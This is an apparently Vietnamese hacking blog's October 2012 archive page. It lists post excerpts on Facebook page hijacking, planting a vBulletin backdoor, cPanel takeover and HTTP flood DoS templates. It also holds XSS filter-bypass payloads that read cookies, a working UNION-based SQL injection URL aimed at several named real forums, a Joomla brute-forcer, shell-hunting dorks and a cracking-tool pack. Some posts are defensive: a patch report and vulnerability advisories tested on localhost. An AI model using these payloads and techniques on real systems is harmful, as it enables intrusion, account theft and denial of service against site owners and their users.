Wednesday, October 31, 2012

Hacking Facebook Fan Page | Juno_okyo's Blog
hack Facebook fan page using javascript. As we all know its difficult to hack Facebook fan page but using this method you can hack Facebook fan page easily.

Now lets start the tutorial of facebook fan page hacking . First of all we will need to setup an exploit and a website to host that exploit. If you already have a registed hosting account then its great otherwise there are couple of free hosting websites that can be used for such purposes like 000webhost.com etc.
ĐỌC TIẾP »

Hacking Facebook Fan Page

By: MIN Software on: 11:52 AM

Tuesday, October 30, 2012

Nhược điểm của trình duyệt Mozilla Firefox là thời gian khởi động và tải trang khá chậm so với Google Chrome. Vấn đề này có thể được khắc phục bằng những thao tác cấu hình đơn giản sau đây.
ĐỌC TIẾP »

Hướng dẫn cách cấu hình để tăng tốc cho firefox

By: MIN Software on: 7:27 PM
Nếu đã từng thiết kế web, bạn sẽ biết về hạn chế khi sử dụng font chữ. Cũng vì thế có rất nhiều phương pháp khắc phục nhược điểm này (sIFR là một phương pháp được nhiều người biết tới). Hôm nay tôi xin giới thiệu với các bạn một cách làm khác: dùng Cufón.

ĐỌC TIẾP »

Hướng dẫn tạo và sử dụng Cufón

By: MIN Software on: 7:20 PM

Monday, October 29, 2012

Sử dụng kỹ thuật giả mạo certificate. Kỹ thuât này do anh “tocbatdat – giảng viên CEH trung tâm I-TRAIN” viết
Link download toàn bộ tool và tài liệu hướng dẫn: http://www.mediafire.com/?igs3x7n3eeiq3g1

ĐỌC TIẾP »

Phương pháp thâm nhập Gmail

By: MIN Software on: 6:14 PM
Clip này Juno_okyo làm để tuyên truyền và cảnh báo về Hack CF thôi.

Mà post lên blog cho bạn nào chưa biết về Keylogger :D

Coi như demo về Keylogger nha!


Demo tấn công qua Keylogger

By: MIN Software on: 2:47 AM

Sunday, October 28, 2012

Share code Flash Intro đẹp (kèm XML)

By: MIN Software on: 10:48 AM

Saturday, October 27, 2012


[Video TUT] Local server 27.0.12.24

By: MIN Software on: 4:17 PM

[TUT] Remote desktop (exploit ms08_067_netapi)

By: MIN Software on: 4:08 PM
Hello, hnay DuyK sẽ hướng dẫn các bạn cách chèn 1 “cửa sau” vào VBB nhanh-gọn-nhẹ-hiệu quả:
Khi bạn đã login vào được admincp của 1 forum vbb nào đó, bạn muốn để lại 1 “cửa sau” trên website này 1 cách kín đáo nhất ?
ĐỌC TIẾP »

Chèn Backdoor vào VBB nhanh-gọn-nhẹ-hiệu quả

By: MIN Software on: 1:55 PM
Google Hacking involves using advance operators in the Google search engine to locate specific strings of text within search results. Some of the more popular examples are finding specific ver- sions of vulnerable Web applications. The following search query would locate all web pages that have that particular text contained within them. It is normal for default installations of applications to include their running version in every page they serve, e.g., "Powered by XOOPS 2.2.3 Final".
The following search query will locate all websites that have the words "admbook" and "version" in the title of the website. It also checks to ensure that the web page being accessed is a PHP file:d
ĐỌC TIẾP »

Google Hacking DataBase (GHDB)

By: MIN Software on: 1:23 PM
Tải lên sy_conf.pl & htaccess và chmod cả 755
Tải lên B-F.php trong một thư mục khác nhau
.htaccess
http://adf.ly/FMy7H
Sy_Conf.pl
http://adf.ly/FMy9j

B-F.php
http://adf.ly/FMyBJ

Cách chiếm cPanel 1 Server

By: MIN Software on: 1:18 PM

★☆★ With the Name of ALLAH, who gave me the Power of Knowledge ! ★☆★


Hey ABH, I am Kr4L BeN!M from security Leechers Team and i am going to teach you all about rooting linux boxes and linux knowledge that you must know if you are hacker :)

[Thanks to All Pakistani and Palestine Hackers ]

ĐỌC TIẾP »

Learn Root - Totally Explaind

By: MIN Software on: 1:13 PM
Vào hôm qua 18/05, một thành viên có nickname là 0in đã gửi lên trang packetstormsecurity.org một mã khai thác từ xa (remote exploit) lợi dụng lỗ hổng trong hàm com_print_typeinfo của PHP phiên bản 5.4.3 dành cho nền tảng Windows.
Trong phần ghi chú, 0in là tác giả của mã khai thác này cho biết, anh ta đã thử nghiệm thành công trên máy Windows XP SP3 được cập nhật đầy đủ các bản vá. Và kết quả là PHP engine sẽ thực thi bất kỳ shellcode nào được chứa trong mã khai thác này.

Hiện vẫn chưa có thông báo và bản vá lỗi chính thức nào từ nhóm phát triển PHP cho lỗi 0-day mới nhất này, nhưng dưới đây là một số biện pháp để hạn chế các rủi ro khác:

• Chặn tất cả các chức năng upload file trong các ứng dụng PHP.
• Sử dụng IPS để lọc các shellcode đã được biết đến, ví dụ các shellcode có trong Metasploit.
• Cập nhật PHP lên phiên bản mới nhất để phòng chống các lỗ hổng khác như CVE-2012-2336 được công bố vào đầu tháng này.
• Sử dụng Host-IPS để chặn bất kỳ các lỗi buffer overflow có thể có trong hệ thống.

(Theo Internet Storm Center (ISC))
Tham khảo:
http://isc.sans.edu/...PoC+in+the+wild
http://packetstormse...rg/files/112851

Nguồn: http://www.hvaonline.../list/42355.hva

Xuất hiện mã khai thác từ xa lỗi 0-day mới của PHP 5.4.3 trên Windows

By: MIN Software on: 12:24 PM
Hi All,


Nhóm Web-center Security Team của Slovenia vừa update phiên bản mới cho công cụ quét lỗ hổng mang tên Joomscan.

Joomscan là công cụ nhỏ gọn viết bằng ngôn ngữ PERL,dùng scan ứng dụng Joomla.

Ở lần update này,database lỗ hổng đã tăng lên 611 vuls so với 550 vuls vào tháng 11 năm ngoái.

Có thể update thông qua command-line (terminal) bằng lệnh :


./joomscan.pl update

Cú pháp sử dụng khá đơn giản :

VD:
- Để scan website uns.vn ta sử dụng : ./joomscan.pl -u uns.vn
- Chi tiết các options : ./joomscan.pl

_LINK DOWNLOAD :
- Windows : http://web-center.si...an/joomscan.rar
- Linux : http://web-center.si...joomscan.tar.gz

Các bạn có thể download source về để optimize và bỏ vào toolbox.

[Tool] Joomscan Security Scanner - Update 611 lỗ hổng của Joomla

By: MIN Software on: 12:23 PM
Mã khai thác lỗi 0-day 4 năm tuổi của Oracle Database đặt người dùng vào tình thế rất nguy hại!

Nguồn: http://www.hvaonline.../list/42263.hva

Ngày 30/04 vừa qua, Oracle đã đưa ra thông báo đặc biệt hướng dẫn các cách khắc phục tạm thời (work-around) về lỗi bảo mật CVE-2012-1675 hay còn gọi là lỗi TNS Listener Poison Attack. Đây là một lỗi bảo mật cực kì nghiêm trọng cho phép các hacker có thể can thiệp từ xa vào luồng dữ liệu trao đổi giữa client và các máy chủ cơ sở dữ liệu Oracle mà không cần đến bất kì một cơ chế xác thực nào.

Trong thông báo này, Oracle chỉ đưa ra các phiên bản bị ảnh hưởng là 10gR2 (10.2.0.x), 11gR1 (11.1.0.x) và 11gR2 (11.2.0.x). Tuy nhiên theo Joxean Koret, người phát hiện ra lỗi bảo mật này thì lỗi này có thể khai thác được với các bản Oracle từ 8i trở đi.

Lỗi CVE-2012-1675 đã được Koret phát hiện ra từ năm 2008 và có thông báo gửi đến hãng Oracle. Trong bản vá bảo mật thường lệ hàng quí vào tháng 4/2012 (CPU-Apr-2012), Oracle đã thông báo lỗi bảo mật này đã được khắc phục cùng lời cảm ơn đến Koret. Ngay sau đó, Koret cũng đã công bố tài liệu về cách thức khai thác lỗi cùng bản PoC của mình trên bugtraq. Tuy nhiên, trong email trao đổi giữa Koret và đại diện của Oracle thì Koret mới “ngã ngửa”: Oracle sẽ chỉ đưa ra bản vá chính thức trong phiên bản chính thức kế tiếp của Oracle database (11gR3 hoặc 12g) vì bản thân Oracle cũng thừa nhận, việc khắc phục lỗi này đòi hỏi phải can thiệp rất sâu vào hệ thống của Oracle điều mà các bản CPU định kì không thể thực hiện được. Như vậy lỗi zero-day sau 4 năm phát hiện vẫn là đang là một lỗi zero-day.

Khuyến cáo từ HVA: các quản trị viên của Oracle database nên có kế hoạch thực hiện sớm nhất có thể việc triển khai các phương án tạm thời theo khuyến cáo của hãng.

Tham khảo:

[1] Oracle Security Alert for CVE-2012-1675
http://www.oracle.com/technetwork/topics/security/alert-cve-2012-1675-1608180.html

[2] Oracle Database new zero day exploit put users at risk
http://thehackernews...ay-exploit.html

Lỗi 0-day 4 năm tuổi của Oracle vẫn chưa được vá

By: MIN Software on: 12:21 PM
Dorks & Shell

________________________ [+] ________________________

For Dorks ::
-hack -exploit -dork -honeypot -honeypage -googlehacking

For Shells ::
+rwx -honeypot -honeypage -"honey page" -googlehacking -dork -treat -topic

ĐỌC TIẾP »

2012 Dorks & Shell

By: MIN Software on: 12:19 PM
Trong bài viết này tôi s đ cp đến câu lnh "into outfile", 1 câu lnh mc đnh ca MySQl nhưng li rt hu ích cho các attacker khi tn công web b dính li SQL Injection (tt nhiên DBs là MySQL). Ngoài ra chúng ta cũng s xem xét qua mt s điu kin như quyn đi vi file (FILE privilege) và vn đ thư mc liên quan.

Chú ý: Tn công mt website mà chưa có s đng ý ca ch nhân là vi phm pháp lut. Bài viết này ch mang tính nghiên cu và hc hi. Tôi khuyến khích mi người nên t cài đt h thng trên máy ca mình và th nghim, không nên tn công phá hoi các site trên thc tế - c0mm3nt 2009
ĐỌC TIẾP »

Kỹ thuật tấn công sử dụng dumpfile/outfile trong SQL Injection

By: MIN Software on: 12:09 PM
Đa số các "bộ lọc" sẽ sử dụng cách cơ bản nhất là chặn các thẻ <script></script>.

Chúng ta sẽ cùng xem một số VD sau:

+Sử dụng các thuộc tính của các thẻ html:

<body onload=alert('test1')>
<b onmouseover=alert('Wufff!')>click me!</b>
<img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>

+Sử dụng thuộc tính SRC:
<IMG SRC=javascript:alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
Encode nội dung (UTF-8)
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

+Sử dụng URI đã được encode base64
<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg">

Chú ý: một số code có thể không chạy được trên một số trình duyệt.
Đây chỉ là một ít trong số rất nhiều cách thực thi các đoạn mã javascript
Các bạn có thể tham khảo thêm tại: http://ha.ckers.org/xss.html

Bypass XSS filters

By: MIN Software on: 11:49 AM
The BJ-oomla v1.00 this is a simple tool for brute force Joomla login. This tool made by S3K4 team and tested on Joomla <=1.5.25.

Available options:
-U file contain list user
-P file contain list password
-u username
-p password
-v verbose
-s signal - default:"Administration Login"
-g user-agent - default: "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0"

Posted Image

Using:
#python bruteJoom.py -h http://test.com -u admin -P password.txt

Download https://sites.google...redirects=0&d=1



ZoneSec.Com

BJ-oomla v1.00 - Brute force Joomla tool

By: MIN Software on: 7:25 AM
Video Tutorial:
http://adf.ly/FMxYr
Pass Unlock:
junookyo
Exploit này cũng có lâu rồi, làm TUT này cho newbie thôi nhé. Pro nào biết rồi miễn quăng gạch :).
ĐỌC TIẾP »

[Tutorial] WHMCS Submitticket Exploit

By: MIN Software on: 2:23 AM

Friday, October 26, 2012

* Tutorial khai thác "ChangUonDyU - Advanced Statistics SQL injection", truy vấn lấy hash để bypass AdminCP, Deface sử dụng XSS.

* Download: http://adf.ly/FMxHr

* Password: JyL4gd74ttL1Y7D

[TUT] SQLi - Login AdminCP - Deface with XSS

By: MIN Software on: 11:59 AM
Cách dùng > thay user agent , thay host name thay Referer, thay random char > ném vào webhunter.

1.Thực tế nó là request của HULK dos tool @@ tut by hisoka @@ lech ghi với nhé

Trích:
GET /?ASH=REHRKP HTTP/1.1
Accept-Encoding: identity
Host: huydiet.vn
Keep-Alive: 110
User-Agent: Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Referer: http://www.google.com/?q=VUCWJE
Cache-Control: no-cache
> random char
>>Keep-Alive: 110 nên set thấp xuống tùy server conf
>>acces từ công cụ tìm kiếm.1 cách qua FW hiệu quả
>> Connection: close > close còn lâu mới nói
>>bypass cache

[TUT] HTTP Flood site HTML và 1 số site không cho connection = keep-alive

By: MIN Software on: 8:42 AM

Skin Metro Windows 8 cực đẹp cho WP

Skin Metro Windows 8 cực đẹp cho WordPress

By: MIN Software on: 6:29 AM
DNS là thành phần cốt lõi trong mạng Internet. Giao thức giúp chuyển đổi một địa chỉ web, thường được gọi là URL thành một địa chỉ thực, hay địa chỉ IP.

Máy tính biết cách truyền tin đến địa chỉ IP nào đó, nhưng lại không trực tiếp biết được địa chỉ IP từ URL, một dạng địa chỉ danh định giúp người dùng dễ nhớ.

Do vậy, DNS server có mặt để giúp phân giải tên miền giúp máy tính có thể lấy được địa chỉ IP dựa trên URL để truyền thông qua Internet. Không phải chỉ có một DNS server trung tâm làm nhiệm vụ phân giải URL cho tất cả mọi người.
ĐỌC TIẾP »

Tăng bảo mật máy tính thông qua DNS server

By: MIN Software on: 5:02 AM

Thursday, October 25, 2012

EBOOKS INCLUDED


Exploit Folder

  • Extreme Exploits - Advanced Defenses Against Hardcore Hacks
  • Hacking - The Art Of Exploitation
  • Shellcoder's Programming Uncovered
  • The Shellcoder's Handbook - Discovering And Exploiting Security Holes
ĐỌC TIẾP »

Ebook Collection [Linux, Exploits, Networking, Programming]

By: MIN Software on: 9:42 PM
    #####################################################################################################
->Vulnerability
#####################################################################################################

->http://target.com/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20

#####################################################################################################

->eg: http://diendanhaiduong.com/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20
http://sinhvientayan.com/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,

user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20

http://vietsource.net/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20

http://tuoitredonganh.vn/diendan/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20

#####################################################################################################
[+] If vbb version 4.1.2,3,4,5 you can install addons Advanced Cookie Manager to fake login.
[+] Md5 Hash Generator -> http://www.miraclesalad.com/webtools/md5.php
[+] Thanks to Juno_okyo & all VNH Group members.

##########################################################################################


ChangUonDyU - Advanced Statistics SQL injection Vulnerability

By: MIN Software on: 1:04 AM

Tuesday, October 23, 2012

Chào các bạn, hôm nay mình sẽ giới thiệu với các bạn công cụ SlowHTTPTest, bản chất công cụ này là để thực hiện một tấn công HTTP DOS nên dĩ nhiên các bạn có thể sử dụng nó với mục đích tấn công. Tuy nhiên, theo chiều hướng ngược lại, các bạn cũng có thể sử dụng công cụ này để thử nghiệm khả năng chịu tải của webserver trước khi public web
ĐỌC TIẾP »

Thử nghiệm khả năng chịu tải của Website với công cụ SlowHTTPTest

By: MIN Software on: 1:39 AM
Xem bài viết tiếng Việt tại đây:
http://junookyo.blogspot.com/2012/10/thu-nghiem-kha-nang-chiu-tai-cua.html
Introduction :
Slow HTTP DoS attacks rely on the fact that the HTTP protocol, by design, requires requests to be completely received by the server before they are processed. SlowHTTPTest is developed by Sergey Shekyan, Who is  Developer Web Application Scanning at Qualys.
This tool is enough capable to acquire resource on server side at application layer.
ĐỌC TIẾP »

How to use SlowHTTPTest HTTP DoS Tool

By: MIN Software on: 1:38 AM
Mấy ngày nay DaiCa.Net đã bị kẻ lạ login vào account admin.
Tuy nhiên kẻ lạ mặt chưa làm gì được

Sau khi được juno_okyo Report là có bug tại mod Changuondyu Static.
Mình đã kiểm tra lại các input, tất cả các input chỉ có 1 input được đưa vào truy vấn, đó là
$_REQUEST['listforumid']

Và quả thật là có bug SQLi. Đây là 1 lỗi cực kỳ nghiêm trọng và sai xót của coder (Còn nghiêm trọng hơn Bug Search VBB vì rất nhiều người đang sử dụng mod này).

Từ Bug này, chúng ta có thể lấy được dữ liệu từ database => Login vào admin => Login vào admincp => Up shell => blah blah

Ở đây DuyK sẽ không nói đến cách khai thác để đề phòng "Hacker chẻ châu" quậy phá mọi người (Hacker thực sự sẽ hiểu vấn đề ngay nên khỏi cần phải nói)

Vì rất nhiều người đang sử dụng mod này và chưa fix nên DuyK hi vọng mọi người sẽ lan truyền report này.

Để fix mod này. Các bạn vào: Admincp -> Plugin & product option -> Plugin manage -> ChangUonDyU - Advanced Statistics - Get Data -> EDIT

Bạn tìm đến dòng:
$foruminid = $vbulletin->db->escape_string($_REQUEST['listforumid']);

Thay bằng:
$foruminid = intval($_REQUEST['listforumid']);

Report từ: DaiCa.Net - Forum newbie học hỏi

P/S by Juno_okyo:

Rất nhiều Diễn đàn đang sử dụng mod Statstics này nên mọi người nhanh chóng fix nhé.
Bug này được phát hiện từ mod tương tự của bác Chang cho MyBB, kiểm tra thì thấy mod bên vBB cũng dính.

[Report] ChangUonDyU Advanced Statistics - SQL injection

By: MIN Software on: 12:16 AM

Monday, October 22, 2012




Hack Pack 3.2.135.68 ENG/2012 | 1.4 GB

Descriptions:-With this updated selection you can regain access to the system, retrieve a forgotten password to a file, instant messenger, website, mail ... Test the strength of the local network, a network of Wi-Fi, to learn something new for themselves in terms of network design, programs, etc. A selection of useful both network administrators and ordinary users.

Ingredients:
Bruteforce & Recovery
Advanced Archive Password Recovery Professional 4.53
Advanced EFS Data Recovery 4.0
Advanced IM Password Pecovery 4.10.297
Advanced Mailbox Password Recovery 1.9.2.223
Advanced Office Password Recovery Pro 5.04.547
Advanced PDF Password Recovery 5.04
Advanced RAR Password Recovery 1.53
Advanced Registry Tracer 2.11
Advanced SQL Password Recovery 1.01
Advanced ZIP Password Recovery 4.0
Brutus AET2
Dialupass 3.16
Elcomsoft Distributed Password Recovery 2.90.215
Elcomsoft Internet Password Breaker 2.0.306
Elcomsoft System Recovery Pro 3.0.466
Elcomsoft Wireless Security Auditor 4.0.211
Facebook Password Extractor 2.0
Lightning Hash Cracker 0.60
Passware Password Recovery Professional 11.1
Password Recovery Bundle 2011 1.80
PasswordsPro 3.1.1.0
Proactive Password Auditor 2.01
Proactive System Password Recovery 6.3.1.786
Product Key Explorer 2.8.6.0
WirelessKeyView 1.36

Scanners & Sniffers
Ace Password Sniffer 1.4
Aircrack-NG 1.1
Angry IP Scanner 3.0
DFind Fast Scanner GUI 2.3
Essential NetTools 4.3.259
ExploitMyUnion 2.1
LanTricks
Metasploit Pro 4.1.0
Safe3 SQL Injector 8.4
SoftPerfect Network Protocol Analyzer 2.7
SoftPerfect Network Scanner 5.3.2
TamoSoft CommView 6.1.636
TamoSoft CommView for WiFi 6.0.581
TamoSoft CommView for WiFi 6.0.585 VoIP
VisualRoute 2010 Pro 14
w3af 1.0
WEP Key Recovery 1.1.27
Wireshark 1.6.5

FAQ & Book
FAQ on Open Door Phone
Google Hacking
HACK-FAQ For Beginners
Hidden Radmin 3
SolarWinds Engineer Toolset Administrator Guide
SQL Injection. Breaking ASP + MSSQL
Administration and Security Linux
Internet address
Linux Security
Wireless Security
Breaking intercoms Metakom, Cyfral, Metacom, Eltis
Exploiting Software
AP Breaking Wi-Fi with WEP Encryption
AP Breaking Wi-Fi with WPA encryption
Types of Hackers
Virtual Wifi in Windows 7
Information Security
Local Area Networks
Wireless networks
Hacking Techniques
Guide for hackers
Network Administration
List of Ports and Description
Hacking Technique - Sockets, Exploits, Shell-code
Technology network attacks
Information Security Technology
Pull-pull uchetki with ADSL-router

Mã:
http://extabit.com/file/279lkb5sw5803/Pack_ENG_2012_By_LoriYagami.rar
Mirror :

Mã:
http://lumfile.com/e7jtivm4z1p0/Pack_ENG_2012_By_LoriYagami.rar.html
Mirror2 :

Mã:
http://www.netload.in/dateiKQRYLtL98C/Pack_ENG_2012_By_LoriYagami.rar.htm
Mirror3 :

Mã:
http://rapidgator.net/file/51346955/Pack_ENG_2012_By_LoriYagami.rar.html
Mirror4 :

Mã:
http://ryushare.com/2904a97c477f/Pack_ENG_2012_By_LoriYagami.rar

Hack Pack 3.2.135.68 ENG/2012

By: MIN Software on: 11:07 PM

Friday, October 19, 2012

TrustedSec Release the latest version of Social-Engineer Toolkit (SET) as 4.1.3. As most of us know that, It is an open source, python-driven, social-engineering penetration testing framework of custom tools which solely focuses on attacking the human element of penetration testing.
Set-Box_2
It was designed in order to arm penetration testers and security researchers with the ability to effectively test heavily advanced social-engineering attacks armed with logical methods. The Social Engineer Toolkit leverages multiple attack vectors that take advantage of the human element of security in an effort to target attackers.
Change version 4.1.3:
* Added multiple checks when importing file, no longer exits the entire application
Download Social Engineer Toolkit 4.1.3:
svn co http://svn.trustedsec.com/social_engineering_toolkit set/

Social-Engineer Toolkit (SET) 4.1.3 Released

By: MIN Software on: 10:20 AM

Thursday, October 18, 2012

jSQL+Injection
jSQL Injection An easy to use SQL injection tool for retrieving database informations from a distant server. 

jSQL Injection fonctionalities are:
  • GET, POST, header, cookie methods
  • visual, errorbase, blind algorithms
  • automatic best algorithms detection
  • data retrieving progression
  • proxy setting
  • For now supports only MySQL.
Running injection requires only the distant server url and the name of parameter you should inject.

Download jSQL Injection v 2.0

jSQL Injection v 2.0 released

By: MIN Software on: 3:51 PM
WebSploit Is An Open Source Project For Scan And Analysis Remote System From Vulnerability.
WebSploit+Framework+2.0.3+with+Wifi+Jammer
WebSploit Is An Open Source Project For :
[>]Social Engineering Works
[>]Scan,Crawler & Analysis Web
[>]Automatic Exploiter
[>]Support Network Attacks
----
[+]Autopwn - Used From Metasploit For Scan and Exploit Target Service
[+]wmap - Scan,Crawler Target Used From Metasploit wmap plugin
[+]format infector - inject reverse & bind payload into file format
[+]phpmyadmin Scanner
[+]LFI Bypasser
[+]Apache Users Scanner
[+]Dir Bruter
[+]admin finder
[+]MLITM Attack - Man Left In The Middle, XSS Phishing Attacks
[+]MITM - Man In The Middle Attack
[+]Java Applet Attack
[+]MFOD Attack Vector
[+]USB Infection Attack
[+]ARP Dos Attack
[+]Web Killer Attack
[+]Fake Update Attack
[+]Fake Access point Attack

Download WebSploit Framework 2.0.3

WebSploit Framework 2.0.3 with Wifi Jammer

By: MIN Software on: 3:49 PM
http://i.imgur.com/6XHnF.png

http://i.imgur.com/EzzCM.png




http://i.imgur.com/E3Vzg.png

Pass Unlock: junookyo.

[vBB] ChangUonDyU Advanced Statistics - SQL injection

By: MIN Software on: 3:33 PM
Tổng hợp eBank - kho eBook cho ai học CNTT:
http://www.mediafire.com/?t3yzw8cnq4qfs
Nguồn: Sưu tầm

Tổng hợp eBook hay dành cho ai học CNTT

By: MIN Software on: 9:52 AM

Author: Janek Vind "waraxe"
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-93.html
Description of vulnerable target:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Enables Social Sharing of your blog posts to 30+ Social Networks. Plugin also
enables you to Automatically Publish or Self Publish your Blog Posts to 25+
Networks.
http://wordpress.org/extend/plugins/social-discussions/
Affected version: 6.1.1
###############################################################################
1. Remote File Inclusion in "social-discussions-networkpub_ajax.php"
###############################################################################
Reasons: Uninitialized variable "$HTTP_ENV_VARS"
Attack vectors: User-supplied parameter "HTTP_ENV_VARS"
Preconditions:
1. register_globals=on
2. register_long_arrays=off
3. allow_url_include=on for RFI if PHP >= 5.2.0
4. PHP must be < 5.3.4 for LFI null-byte attacks
5. magic_quotes_gpc=off for LFI null-byte attacks
Php script "social-discussions-networkpub_ajax.php" line 2:
------------------------[ source code start ]----------------------------------
if (!function_exists('add_action')){
@include_once($GLOBALS['HTTP_ENV_VARS']['DOCUMENT_ROOT'] . "/wp-config.php");
------------------------[ source code end ]------------------------------------
We can see, that script expects old-style array "HTTP_ENV_VARS" to be initialized
and containing "DOCUMENT_ROOT" entry. But it appears, that if PHP directive
"register_long_arrays=off", then "HTTP_ENV_VARS" is uninitialized and if in
same time "register_globals=on", it is possible to fill that array with any
value, leading to the RFI (Remote File Inclusion) vulnerability.
Tests:
http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub_ajax.php?HTTP_ENV_VARS[DOCUMENT_ROOT]=http://php.net/?
http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub_ajax.php?HTTP_ENV_VARS[DOCUMENT_ROOT]=/proc/self/environz
###############################################################################
2. Full Path Disclosure in multiple scripts
###############################################################################
Reasons: Direct request to php script triggers pathname leak in error message
Preconditions: PHP directive display_errors=on
Result: Information Exposure Through an Error Message
Tests:
http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub.php
Fatal error: Call to undefined function __() in
C:\apache_www\wp342\wp-content\plugins\social-discussions\social-discussions-networkpub.php on line 2
http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions.php
Fatal error: Call to undefined function __() in
C:\apache_www\wp342\wp-content\plugins\social-discussions\social-discussions-networkpub.php on line 2
http://localhost/wp342/wp-content/plugins/social-discussions/social_discussions_service_names.php
Fatal error: Call to undefined function __() in
C:\apache_www\wp342\wp-content\plugins\social-discussions\social_discussions_service_names.php on line 3


# 1337day.com [2012-10-18]

Wordpress Social Discussions 6.1.1 File Inclusion / Path Disclosure

By: MIN Software on: 5:26 AM

Author: Janek Vind "waraxe"
Date: 17. October 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-92.html
Description of vulnerable target:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Slideshow provides an easy way to integrate a slideshow for any WordPress
installation.
Any image can be loaded into the slideshow by picking it from the WordPress
media page, even images you've already uploaded can be inserted into your
slideshow right away!
http://wordpress.org/extend/plugins/slideshow-jquery-image-gallery/
Affected version: 2.1.12
###############################################################################
1. Reflected XSS in "views/SlideshowPlugin/slideshow.php"
###############################################################################
Reasons:
1. Uninitialized variables "$randomId", "$slides" and "$settings"
2. Improper encoding or escaping of output
Attack vectors: User-supplied parameters "randomId", "slides" and "settings"
Preconditions: PHP directive register_globals=on
Tests:
http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId="><script>alert(123);</script>
http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=<script>alert(123);</script>
http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?settings=<body+onload='alert(123)'>
###############################################################################
2. Reflected XSS in "views/SlideshowPluginPostType/settings.php"
###############################################################################
Reasons:
1. Uninitialized variables "$settings" and "$inputFields"
2. Improper encoding or escaping of output
Attack vectors: User-supplied parameters "settings" and "inputFields"
Preconditions: PHP directive register_globals=on
Tests:
http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=<script>alert(123);</script>
http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[0][]&inputFields[0]=<script>alert(123);</script>
###############################################################################
3. Reflected XSS in "views/SlideshowPluginPostType/style-settings.php"
###############################################################################
Reasons:
1. Uninitialized variables "$settings" and "$inputFields"
2. Improper encoding or escaping of output
Attack vectors: User-supplied parameters "settings" and "inputFields"
Preconditions: PHP directive register_globals=on
Tests:
http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0][3]=<script>alert(123);</script>
http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=<script>alert(123);</script>
###############################################################################
4. Full Path Disclosure in multiple scripts
###############################################################################
Reasons: Direct request to php script triggers pathname leak in error message
Preconditions: PHP directive display_errors=on
Result: Information Exposure Through an Error Message
Tests:
http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/slideshow.php
Fatal error: Call to undefined function add_action() in
C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\slideshow.php on line 34
http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/classes/SlideshowPluginWidget.php
Fatal error: Class 'WP_Widget' not found in
C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\classes\SlideshowPluginWidget.php on line 8
http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php
Fatal error: Class 'SlideshowPluginMain' not found in
C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPlugin\slideshow.php on line 111
http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/information.php
Fatal error: Call to undefined function _e() in
C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPluginPostType\information.php on line 1
http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php
Warning: Invalid argument supplied for foreach() in
C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPluginPostType\settings.php on line 3
http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/slides.php
Fatal error: Class 'SlideshowPluginSlideInserter' not found in
C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPluginPostType\slides.php on line 3
http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php
Warning: Invalid argument supplied for foreach() in
